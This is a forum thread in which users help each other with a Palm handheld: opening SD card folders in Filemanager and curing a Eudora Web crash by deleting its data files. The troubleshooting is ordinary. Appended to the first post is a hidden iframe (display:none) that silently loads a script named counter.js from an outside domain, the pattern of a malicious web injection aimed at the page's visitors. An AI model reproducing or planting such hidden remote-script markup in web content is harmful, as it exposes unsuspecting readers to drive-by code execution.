+ Reply to Thread

Filemanager and SD Card

When I look at my SD card with Filemanager it shows me the two folders on the card, PALM and AUDIO, but I can't figure out how to open the folders to see what's inside of them. Tapping on the folder with the stylus highlights it but doesn't open it. Is this normal? Is the format on my SD card screwed up?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Are you tapping on the folder icon? If you tap on the name of the file, the name is just highlighted. Tapping on the file icon opens the folder for me.

Originally posted by Lnoble
    Are you tapping on the folder icon? If you tap on the name of the file, the name is just highlighted. Tapping on the file icon opens the folder for me.
    Right... it took me a couple times to figure that part out. Since then, no problems
    Please visit my picture site: Robert-O-Rama :)

Filemanager and SD Card

Thanks. Problem solved.

Now here's another unrelated problem perhaps you can help me with.

Some unknown software conflict gives me an immediate black screen of death just by opening Eudora Web.

I know its got to be a software conflict because if I do a hard reset, reverting the 7135 to its original state, Eudora Web works again.

So how would you systematically go about finding the offender?
    I do have Backup Buddy, but I'm still at a loss as to how to best go about what seems to be a daunting task.

Filemanager and SD Card

Ok, nevermind. I solved that problem too. I used Filemanager to delete all the data files associated with Eudora Web. Must have been something screwy about one of them, but now Eudora Web works fine.